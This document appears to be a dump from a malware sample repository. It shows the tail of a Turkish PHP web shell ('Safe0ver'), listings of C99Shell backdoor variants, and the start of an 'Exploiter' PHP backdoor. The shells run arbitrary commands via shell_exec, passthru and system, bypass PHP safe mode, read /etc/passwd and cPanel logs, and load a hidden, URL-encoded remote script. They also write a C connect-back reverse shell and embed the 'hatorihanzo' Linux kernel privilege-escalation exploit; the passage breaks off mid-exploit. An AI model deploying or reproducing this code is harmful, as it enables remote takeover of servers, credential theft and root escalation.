elseif ( $cmd=="deldir" ) {
echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (Mydeldir($file)==false) {
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="delfile" ) { echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (@unlink($file)==false) {
echo "Could not remove \"$file\"<br>";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="newfile" ) {
echo "<center><table><tr><td NOWRAP>";
$i = 1;
while (file_exists("$lastdir/newfile$i.txt"))
$i++;
$file = fopen("$lastdir/newfile$i.txt", "w+");
if ($file == false)
echo "Could not create the new file...<br>";
else
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
echo "
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\">
</form></center>
</td></tr></table></center> ";
}
elseif ( $cmd=="newdir" ) {
echo "<center><table><tr><td NOWRAP>" ;
$i = 1;
while (is_dir("$lastdir/newdir$i"))
$i++;
$file = mkdir("$lastdir/newdir$i", 0777);
if ($file == false)
echo "Could not create the new directory...<br>";
else
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\">
</form></center></td></tr></table></center>";
}
elseif ( $cmd=="edit" ) {
$contents = "";
$fc = @file( $file );
while ( @list( $ln, $line ) = each( $fc ) ) {
$contents .= htmlentities( $line ) ;
}
echo "<br><center><table><tr><td NOWRAP>";
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
echo "<strong>EDIT FILE: </strong>$file<br>\n";
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
echo "<input type=\"submit\" value=\"Save\">";
echo "</form>";
echo "</td></tr></table></center>";
}
elseif ( $cmd=="saveedit" ) {
$fo = fopen($file, "w");
$wrret = fwrite($fo, stripslashes($contents));
$clret = fclose($fo);
}
elseif ( $cmd=="downl" ) {
$downloadfile = urldecode($file);
if (function_exists("basename"))
$downloadto = basename ($downloadfile);
else
$downloadto = "download.ext";
if (!file_exists("$downloadfile"))
echo "The file does not exist";
else {
$size = @filesize("$downloadfile");
if ($size != false) {
$add="; size=$size";
}
else {
$add="";
}
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=$downloadto$add");
$fp=fopen("$downloadfile" ,"rb");
fpassthru($fp);
flush();
}
}
elseif ( $cmd=="upload" ) {
?>
<center>
<table>
<tr>
<td NOWRAP>
Dosya Y?kleme Sekmesine Tikladiniz !
<br> Eger Y?klemek istediginiz Dosya mevcut ise ?zerine Yazilir.<br><br>
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
<input type="hidden" name="cmd" value="uploadproc">
<input type="hidden" name="dir" value="<?php echo $dir ?>">
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
Dosya Y?kle:<br>
<input size="75" name="userfile" type="file"><br>
<input type="submit" value="Y?kle">
</form>
<br>
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
<input tabindex="0" type="submit" value="Iptal">
</form>
</td>
</tr>
</table>
</center>
<?php
}
elseif ( $cmd=="uploadproc" ) {
echo "<center><table><tr><td NOWRAP>";
if (file_exists($userfile))
$res = copy($userfile, "$dir/$userfile_name");
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
if ($res) {
echo "Basariyla Y?klendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
echo "Y?klenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
}
else {
echo "Y?klenemedi...";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form></center>" ;
echo "<br><br></td></tr></table></center>";
}
elseif ( $cmd=="file" ) {
echo "<hr>";
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
echo spacetonbsp(@htmlentities($line))."<br>\n";
}
echo "<hr>";
}
elseif ( $cmd=="ren" ) {
if (function_exists('is_dir')) {
if (is_dir("$oldfile")) {
$objname = "Directory";
$objident = "Directory";
}
else {
$objname = "Filename";
$objident = "file";
}
}
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
If (empty($newfile) != true) {
echo "<center>";
$return = @rename($oldfile, "$olddir$newfile");
if ($return) {
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
}
else {
if ( @file_exists("$olddir$newfile") ) {
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
}
else {
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
}
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a D?n\"></form></center>" ;
}
else {
$dpos = strrpos($oldfile, "/");
if (strval($dpos)!="") {
$olddir = substr($oldfile, 0, $dpos+1);
}
else {
$olddir = "$lastdir/";
}
$fpos = strrpos($oldfile, "/");
if (strval($fpos)!="") {
$inputfile = substr($oldfile, $fpos+1);
}
else {
$inputfile = "";
}
echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
echo "Rename \"$oldfile\" to:<br>\n";
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
echo "</td></tr></table></center>";
}
}
else if ( $cmd == "con") {
?>
<center>
<table>
<tr><td>&nbsp;</td>
</tr></table>
<?php
}
else {
$isMainMenu = true;
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="border">
<center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
</td>
</tr>
</table>
<br>
<center>
<table border="0" NOWRAP>
<tr>
<td valign="top" class="silver border">
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass ?zelligi Eklenmis Ve B?ylece Tahrip G?c? Y?kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S?m?ren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullan?m:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
</span></td>
</tr>
</table>
<br><p><br>Safe Mode ByPAss<p><form method="POST">
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
<input type="submit" value="?alistir"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="dizin">
<option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
<option value="cat /etc/passwd">cat /etc/passwd</option>
<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
<option value="cat /etc/hosts">cat /etc/hosts</option>
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
<option value="netstat -an | grep -i listen">A?ik Portlar</option>
<option value="ps -aux">?alisan Uygulamalar</option>
</select> <input type="submit" value="?alistir"></p>
</form>
------------------------------------------------------------------------------------<p>
<?
$evilc0der=$_POST['dizin'];
if($_POST['dizin'])
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$safemodgec = shell_exec($evilc0der);
echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
}
?>
<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%70%68%70%2D%73%68%65%6C%6C%2E%6F%72%67%2F%63%77%68%69%64%64%65%6E%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E'));
//-->
</Script>
</center>
<br>
<?php
}
if ($cmd != "downl") {
if ( $isMainMenu != true) {
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" style="class="silver border">
<center><strong>
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
</strong></center>
</td>
</tr>
</table>
<br>
<?php
}
?>
<table width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<?php
}
?>

3069
PHP/Backdoor.PHP.C99Shell.a Normal file
View File

File diff suppressed because it is too large Load Diff

3076
PHP/Backdoor.PHP.C99Shell.ad Normal file
View File

File diff suppressed because it is too large Load Diff

2927
PHP/Backdoor.PHP.C99Shell.af Normal file
View File

File diff suppressed because it is too large Load Diff

3013
PHP/Backdoor.PHP.C99Shell.ag Normal file
View File

File diff suppressed because it is too large Load Diff

3545
PHP/Backdoor.PHP.C99Shell.al Normal file
View File

File diff suppressed because one or more lines are too long

80
PHP/Backdoor.PHP.C99Shell.am Normal file
View File

File diff suppressed because one or more lines are too long

3318
PHP/Backdoor.PHP.C99Shell.ao Normal file
View File

File diff suppressed because it is too large Load Diff

22
PHP/Backdoor.PHP.C99Shell.aq Normal file
View File

File diff suppressed because one or more lines are too long

3159
PHP/Backdoor.PHP.C99Shell.bv Normal file
View File

File diff suppressed because it is too large Load Diff

3069
PHP/Backdoor.PHP.C99Shell.c Normal file
View File

File diff suppressed because it is too large Load Diff

3076
PHP/Backdoor.PHP.C99Shell.d Normal file
View File

File diff suppressed because it is too large Load Diff

2782
PHP/Backdoor.PHP.C99Shell.e Normal file
View File

File diff suppressed because it is too large Load Diff

3284
PHP/Backdoor.PHP.C99Shell.h Normal file
View File

File diff suppressed because it is too large Load Diff

2877
PHP/Backdoor.PHP.C99Shell.i Normal file
View File

File diff suppressed because it is too large Load Diff

3556
PHP/Backdoor.PHP.C99Shell.m Normal file
View File

File diff suppressed because one or more lines are too long

3149
PHP/Backdoor.PHP.C99Shell.w Normal file
View File

File diff suppressed because it is too large Load Diff

652
PHP/Backdoor.PHP.Exploiter.a Normal file
View File

@ -0,0 +1,652 @@
<CENTER>
<DIV STYLE="font-family: verdana; font-size: 25px; font-weight: bold; color: #F3b700;">
<font color="#00FF00">
<marquee scrolldelay="30" scrollamount="2">Ashiyane Digital Security Team </marquee></font></DIV>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3b700;">&nbsp;<p>
<span style="font-weight: 400"><font color="#0000FF">/server Irc.Ashiyane.com&nbsp;
/j #virus&nbsp; #Ashiyane</font></span></p>
<p><font color="#FF0000"><b>Virus@Ashiyane.com<BR>
</b></font></DIV>
<?php
//
closelog( );
$dono = get_current_user( );
$ver = phpversion( );
$login = posix_getuid( );
$euid = posix_geteuid( );
$gid = posix_getgid( );
if ($chdir == "") $chdir = getcwd( );
?>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = posix_uname( );
while (list($info, $value) = each ($uname)) {
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;"><?= $info ?>
<font color="#F3B700">:</font></DIV></TD>
</TR>
<?php
}
?>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
<font color="#F3B700">Script Current User: <?= $dono ?></font></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
<font color="#F3B700">PHP Version: <?= $ver ?></font></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
<font color="#F3B700">User Info: uid(<?= $login ?>) euid(<?= $euid ?>) gid(<?= $gid ?>)</font></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
<font color="#F3B700">Current Path: <?= $chdir ?></font></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
<font color="#F3B700">Server IP: <?php $aaa = gethostbyname($SERVER_NAME); echo $aaa;?>
</font></DIV></TD>
</TR>
<TR>
<TD><DIV STYLE="font-family: verdana; font-size: 15px;">
<font color="#F3B700">Web Server: <?= "$SERVER_SOFTWARE $SERVER_VERSION"; ?>
</font></DIV></TD>
</TR>
</TABLE>
<BR>
<?php
if ($cmd != "") {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*]
<font color="#0000FF">Command Mode Run</DIV></font>";
?>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">
<font color="#FF0000">Command Prompt</font></DIV>
<?php
if ($fe == 1){
$fe = "exec";
}
if ($fe == ""){
$fe = "passthru";
}
if ($fe == "2"){
$fe = "system";
}
if (isset($chdir)) @chdir($chdir);
ob_start( );
$fe("$cmd 2>&1");
$output = ob_get_contents();
ob_end_clean( );
?>
<TEXTAREA COLS="75" ROWS="8" STYLE="font-family: verdana; font-size: 12px;">
<?php
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</TEXTAREA>
<BR>
<?php
}
if ($safemode != "") {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*]
<font color="#FF00FF">Safemode Mode Run</DIV></font>";
?>
<DIV STYLE="font-family: verdana; font-size: 20px; font-weight: bold; color: #F3A700;">
<font color="#FF0000">Safe Mode Directory Listing</font></DIV>
<?php
if ($dir = @opendir($chdir)) {
echo "<TABLE border=1 cellspacing=1 cellpadding=0>";
echo "<TR>";
echo "<TD valign=top>";
echo "<b><font size=2 face=arial>List All Files</b> <br><br>";
while (($file = readdir($dir)) !== false) {
if (@is_file($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=green>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&see=$file>$file</a><br>";
// echo "<font color=green>$file1 - $file2 - $file </font><br>";
flush( );
}
}
echo "</TD>";
echo"<TD valign=top>";
echo "<font size=2 face=arial><font color="#FF00FF"><b>List Only Folders</b>
</font> <br><br>";
if ($dir = @opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_dir($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=blue>$file1 - $file2 - <a href=$SCRIPT_NAME?$QUERY_STRING&chdir=$chdir/$file>$file</a><br>";
// echo "<font color=blue>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo"<TD valign=top>";
echo "</font><font color=#00FF00><b>List Writable Folders</b></font><font color=blue><br><br>";
if ($dir = @opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_writable($file) && @is_dir($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=red>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo "</TD>";
echo "<TD valign=top>";
echo "</font><font color=#00FF00><b>List Writable Files</b> </font><font color=blue> <br><br>";
if ($dir = opendir($chdir)) {
while (($file = readdir($dir)) !== false) {
if (@is_writable($file) && @is_file($file)) {
$file1 = fileowner($file);
$file2 = fileperms($file);
echo "<font color=red>$file1 - $file2 - $file </font><br>";
}
}
}
echo "</TD>";
echo "</TR>";
echo "</TABLE>";
}
}
?>
<?php
if ($shell == "write") {
$shell = "#include <stdio.h>\n" .
"#include <sys/socket.h>\n" .
"#include <netinet/in.h>\n" .
"#include <arpa/inet.h>\n" .
"#include <netdb.h>\n" .
"int main(int argc, char **argv) {\n" .
" char *host;\n" .
" int port = 80;\n" .
" int f;\n" .
" int l;\n" .
" int sock;\n" .
" struct in_addr ia;\n" .
" struct sockaddr_in sin, from;\n" .
" struct hostent *he;\n" .
" char msg[ ] = \"Welcome to Haji virus Connect Back Shell\\n\\n\"\n" .
" \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
" \"For More Reliable Shell.\\n\"\n" .
" \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
" \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
" printf(\"Haji virus Connect Back Backdoor\\n\\n\");\n" .
" if (argc < 2 || argc > 3) {\n" .
" printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
" return 1;\n" .
" }\n" .
" printf(\"[*] Dumping Arguments\\n\");\n" .
" l = strlen(argv[1]);\n" .
" if (l <= 0) {\n" .
" printf(\"[-] Invalid Host Name\\n\");\n" .
" return 1;\n" .
" }\n" .
" if (!(host = (char *) malloc(l))) {\n" .
" printf(\"[-] Unable to Allocate Memory\\n\");\n" .
" return 1;\n" .
" }\n" .
" strncpy(host, argv[1], l);\n" .
" if (argc == 3) {\n" .
" port = atoi(argv[2]);\n" .
" if (port <= 0 || port > 65535) {\n" .
" printf(\"[-] Invalid Port Number\\n\");\n" .
" return 1;\n" .
" }\n" .
" }\n" .
" printf(\"[*] Resolving Host Name\\n\");\n" .
" he = gethostbyname(host);\n" .
" if (he) {\n" .
" memcpy(&ia.s_addr, he->h_addr, 4);\n" .
" } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
" printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
" return 1;\n" .
" }\n" .
" sin.sin_family = PF_INET;\n" .
" sin.sin_addr.s_addr = ia.s_addr;\n" .
" sin.sin_port = htons(port);\n" .
" printf(\"[*] Connecting...\\n\");\n" .
" if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
" printf(\"[-] Socket Error\\n\");\n" .
" return 1;\n" .
" }\n" .
" if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
" printf(\"[-] Unable to Connect\\n\");\n" .
" return 1;\n" .
" }\n" .
" printf(\"[*] Spawning Shell\\n\");\n" .
" f = fork( );\n" .
" if (f < 0) {\n" .
" printf(\"[-] Unable to Fork\\n\");\n" .
" return 1;\n" .
" } else if (!f) {\n" .
" write(sock, msg, sizeof(msg));\n" .
" dup2(sock, 0);\n" .
" dup2(sock, 1);\n" .
" dup2(sock, 2);\n" .
" execl(\"/bin/sh\", \"shell\", NULL);\n" .
" close(sock);\n" .
" return 0;\n" .
" }\n" .
" printf(\"[*] Detached\\n\\n\");\n" .
" return 0;\n" .
"}\n";
$fp = fopen("/tmp/dc-connectback.c", "w");
$ok = fwrite($fp, $shell);
if (!empty($ok)) {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[*] Connect Back Shell Was Successfuly Copied</DIV>";
} else {
echo "<DIV STYLE=\"font-family: verdana; font-size: 15px;\">[-] An Error Has Ocurred While Copying Shell</DIV>";
}
}
if ($kernel == "write") {
$kernel = "/*\n" .
" * hatorihanzo.c\n" .
" * Linux kernel do_brk vma overflow exploit.\n" .
" *\n" .
" * The bug was found by Paul (IhaQueR) Starzetz <paul@isec.pl>\n" .
" *\n" .
" * Further research and exploit development by\n" .
" * Wojciech Purczynski <cliph@isec.pl> and Paul Starzetz.\n" .
" *\n" .
" * (c) 2003 Copyright by IhaQueR and cliph. All Rights Reserved.\n" .
" *\n" .
" * COPYING, PRINTING, DISTRIBUTION, MODIFICATION, COMPILATION AND ANY USE\n" .
" * OF PRESENTED CODE IS STRICTLY PROHIBITED.\n" .
"*/\n" .
"#define _GNU_SOURCE\n" .
"#include <stdio.h>\n" .
"#include <stdlib.h>\n" .
"#include <errno.h>\n" .
"#include <string.h>\n" .
"#include <unistd.h>\n" .
"#include <fcntl.h>\n" .
"#include <signal.h>\n" .
"#include <paths.h>\n" .
"#include <grp.h>\n" .
"#include <setjmp.h>\n" .
"#include <stdint.h>\n" .
"#include <sys/mman.h>\n" .
"#include <sys/ipc.h>\n" .
"#include <sys/shm.h>\n" .
"#include <sys/ucontext.h>\n" .
"#include <sys/wait.h>\n" .
"#include <asm/ldt.h>\n" .
"#include <asm/page.h>\n" .
"#include <asm/segment.h>\n" .
"#include <linux/unistd.h>\n" .
"#include <linux/linkage.h>\n" .
"#define kB * 1024\n" .
"#define MB * 1024 kB\n" .
"#define GB * 1024 MB\n" .
"#define MAGIC 0xdefaced /* I should've patented this number -cliph */\n" .
"#define ENTRY_MAGIC 0\n" .
"#define ENTRY_GATE 2\n" .
"#define ENTRY_CS 4\n" .
"#define ENTRY_DS 6\n" .
"#define CS ((ENTRY_CS << 2) | 4)\n" .
"#define DS ((ENTRY_DS << 2) | 4)\n" .
"#define GATE ((ENTRY_GATE << 2) | 4 | 3)\n" .
"#define LDT_PAGES ((LDT_ENTRIES*LDT_ENTRY_SIZE+PAGE_SIZE-1) / PAGE_SIZE)\n" .
"#define TOP_ADDR 0xFFFFE000U\n" .
"/* configuration */\n" .
"unsigned task_size;\n" .
"unsigned page;\n" .
"uid_t uid;\n" .
"unsigned address;\n" .
"int dontexit = 0;\n" .
"void fatal(char * msg)\n" .
"{\n" .
" fprintf(stderr, \"[-] %s: %s\\n\", msg, strerror(errno));\n" .
" if (dontexit) {\n" .
" fprintf(stderr, \"[-] Unable to exit, entering neverending loop.\\n\");\n" .
" kill(getpid(), SIGSTOP);\n" .
" for (;;) pause();\n" .
" }\n" .
" exit(EXIT_FAILURE);\n" .
"}\n" .
"void configure(void)\n" .
"{\n" .
" unsigned val;\n" .
" task_size = ((unsigned)&val + 1 GB ) / (1 GB) * 1 GB;\n" .
" uid = getuid();\n" .
"}\n" .
"void expand(void)\n" .
"{\n" .
" unsigned top = (unsigned) sbrk(0);\n" .
" unsigned limit = address + PAGE_SIZE;\n" .
" do {\n" .
" if (sbrk(PAGE_SIZE) == NULL)\n" .
" fatal(\"Kernel seems not to be vulnerable\");\n" .
" dontexit = 1;\n" .
" top += PAGE_SIZE;\n" .
" } while (top < limit);\n" .
"}\n" .
"jmp_buf jmp;\n" .
"#define MAP_NOPAGE 1\n" .
"#define MAP_ISPAGE 2\n" .
"void sigsegv(int signo, siginfo_t * si, void * ptr)\n" .
"{\n" .
" struct ucontext * uc = (struct ucontext *) ptr;\n" .
" int error_code = uc->uc_mcontext.gregs[REG_ERR];\n" .
" (void)signo;\n" .
" (void)si;\n" .
" error_code = MAP_NOPAGE + (error_code & 1);\n" .
" longjmp(jmp, error_code);\n" .
"}\n" .
"void prepare(void)\n" .
"{\n" .
" struct sigaction sa;\n" .
" sa.sa_sigaction = sigsegv;\n" .
" sa.sa_flags = SA_SIGINFO | SA_NOMASK;\n" .
" sigemptyset(&sa.sa_mask);\n" .
" sigaction(SIGSEGV, &sa, NULL);\n" .
"}\n" .
"int testaddr(unsigned addr)\n" .
"{\n" .
" int val;\n" .
" val = setjmp(jmp);\n" .
" if (val == 0) {\n" .
" asm (\"verr (%%eax)\" : : \"a\" (addr));\n" .
" return MAP_ISPAGE;\n" .
" }\n" .
" return val;\n" .
"}\n" .
"#define map_pages (((TOP_ADDR - task_size) + PAGE_SIZE - 1) / PAGE_SIZE)\n" .
"#define map_size (map_pages + 8*sizeof(unsigned) - 1) / (8*sizeof(unsigned))\n" .
"#define next(u, b) do { if ((b = 2*b) == 0) { b = 1; u++; } } while(0)\n" .
"void map(unsigned * map)\n" .
"{\n" .
" unsigned addr = task_size;\n" .
" unsigned bit = 1;\n" .
" prepare();\n" .
" while (addr < TOP_ADDR) {\n" .
" if (testaddr(addr) == MAP_ISPAGE)\n" .
" *map |= bit;\n" .
" addr += PAGE_SIZE;\n" .
" next(map, bit);\n" .
" }\n" .
" signal(SIGSEGV, SIG_DFL);\n" .
"}\n" .
"void find(unsigned * m)\n" .
"{\n" .
" unsigned addr = task_size;\n" .
" unsigned bit = 1;\n" .
" unsigned count;\n" .
" unsigned tmp;\n" .
" prepare();\n" .
" tmp = address = count = 0U;\n" .
" while (addr < TOP_ADDR) {\n" .
" int val = testaddr(addr);\n" .
" if (val == MAP_ISPAGE && (*m & bit) == 0) {\n" .
" if (!tmp) tmp = addr;\n" .
" count++;\n" .
" } else {\n" .
" if (tmp && count == LDT_PAGES) {\n" .
" errno = EAGAIN;\n" .
" if (address)\n" .
" fatal(\"double allocation\\n\");\n" .
" address = tmp;\n" .
" }\n" .
" tmp = count = 0U;\n" .
" }\n" .
" addr += PAGE_SIZE;\n" .
" next(m, bit);\n" .
" }\n" .
" signal(SIGSEGV, SIG_DFL);\n" .
" if (address)\n" .
" return;\n" .
" errno = ENOTSUP;\n" .
" fatal(\"Unable to determine kernel address\");\n" .
"}\n" .
"int modify_ldt(int, void *, unsigned);\n" .
"void ldt(unsigned * m)\n" .
"{\n" .
" struct modify_ldt_ldt_s l;\n" .
" map(m);\n" .
" memset(&l, 0, sizeof(l));\n" .
" l.entry_number = LDT_ENTRIES - 1;\n" .
" l.seg_32bit = 1;\n" .
" l.base_addr = MAGIC >> 16;\n" .
" l.limit = MAGIC & 0xffff;\n" .
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
" fatal(\"Unable to set up LDT\");\n" .
" l.entry_number = ENTRY_MAGIC / 2;\n" .
" if (modify_ldt(1, &l, sizeof(l)) == -1)\n" .
" fatal(\"Unable to set up LDT\");\n" .
" find(m);\n" .
"}\n" .
"asmlinkage void kernel(unsigned * task)\n" .
"{\n" .
" unsigned * addr = task;\n" .
" /* looking for uids */\n" .
